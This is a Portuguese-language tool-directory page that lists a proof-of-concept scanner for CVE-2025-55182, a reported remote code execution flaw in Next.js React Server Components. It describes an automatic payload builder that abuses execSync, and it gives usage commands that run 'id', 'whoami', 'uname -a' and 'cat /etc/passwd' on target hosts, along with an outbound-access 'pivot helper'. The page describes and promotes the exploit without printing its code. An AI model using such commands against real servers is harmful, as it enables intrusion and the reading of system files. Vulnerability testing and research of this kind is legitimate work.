Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
POC-CVE-2025-55182 — POC-CVE-2025-55182 | Kitploit
Ferramentas/GitHubGitHub/devvaibhav07/poc-cve-2025-55182
Vulnerability ScannersPayload GenerationExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubdevvaibhav07/poc-cve-2025-55182

POC-CVE-2025-55182

POC-CVE-2025-55182

Ver Repositório
há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55182 Scanner Avançado

Um utilitário de exploração completo para CVE-2025-55182 — Execução Remota de Código via Componentes de Servidor React no Next.js. O scanner cria automaticamente o payload multipart e abusa de process.mainModule.require('child_process').execSync() para alcançar execução arbitrária de comandos do SO em instâncias vulneráveis.

Funcionalidades

  • Gerador automático de payload — sem necessidade de codificação manual
  • Execução de comando com extração limpa do STDOUT
  • Detecção automática de protocolo (https:// aplicado se ausente)
  • Decodificação correta de URL + restauração de novas linhas
  • Saída colorida e rica para feedback rápido do operador
  • Identificação de erros (500 / 403 / SSL / timeout / padrões WAF)

Instalação

chmod +x scanner.sh

Uso

Varredura padrão (executa 'id')

./scanner.sh -d vulnerable-app.com

Execução de comando personalizada

./scanner.sh -d vulnerable-app.com -c "whoami"

Com protocolo explícito

./scanner.sh -d http://localhost:3000 -c "cat /etc/passwd"

Opções

Screenshot 2025-12-09 at 16 13 23

Exemplos

Verificar RCE

./scanner.sh -d shop.example.com

Identificação do sistema

./scanner.sh -d shop.example.com -c "uname -a"

Enumeração de caminhos graváveis

./scanner.sh -d shop.example.com -c "ls -la /var/www"

Ajudante de pivot — verificar acesso de saída

./scanner.sh -d shop.example.com -c "ping -c 4 google.com"

Sinta-se à vontade para entrar em contato pelo mailto:[email protected]

Baixar ferramenta